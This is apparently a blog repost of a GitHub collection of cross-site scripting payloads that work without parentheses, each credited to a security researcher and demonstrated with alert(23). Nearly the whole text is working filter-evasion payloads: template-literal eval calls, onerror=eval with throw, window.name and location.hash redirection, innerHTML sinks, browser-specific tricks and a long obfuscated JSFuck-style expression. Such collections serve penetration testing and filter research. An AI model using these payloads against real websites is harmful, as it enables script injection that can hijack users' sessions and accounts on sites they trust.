XSS-Payloads

XSS Without parentheses ()

This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...

All the POC's are alert box with number 23


alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Garethheyes

{onerror=alert}throw 23

Garethheyes

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

terjanq

Put %0aalert(/23/)// anywhere in the URL

location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location

terjanq

x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x

terjanq

example.com/xss?%0aalert(/23/)//


Function`a${unescape. call`${location}`}```

aemkei

onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';

aemkei

onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

aemkei

throw/**/Uncaught=window.onerror=eval,";alert\5023\51"

Gareth Heyes

x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x

BitK

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

BitK

range = document.createRange``; 
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;

BitK

Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```

albinowax

window.name="alert(23)"
location="xss.html"

xss.html

eval.constructor`eval\x28name\x29```

hasegawayosuke

window.name="alert(23)"
location="xss.html"

xss.html

[].every.call`eval\x28name\x29${eval}`

Tomer Zait

[]["filter"]["constructor"]`alert\x2823\x29```

Pepe Vila

Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];

RootEval

x='javascript:alert\x2823\x29';x={x:location}=this

iwasakinoriaki

window.name="alert(23)"
location="xss.html"

xss.html

eval.call`${top.name}`

Cure53

window.name="<img src=x onerror=alert(23)>"
location="xss.html"

xss.html

document.write`${top.name}`

mage_1868

location="https://example.com/xss.html/.source;alert(23)?xss="

example.com

eval.call`${location.pathname}`

Only Firefox Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']

</script>


<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol

</script>

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'> 

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;


Anything: @RenwaX23

来源:
https://github.com/RenwaX23/XSS-Payloads/edit/master/Without-Parentheses.md

posted @ 2021-04-06 22:05  rab3it  阅读(164)  评论(0编辑  收藏  举报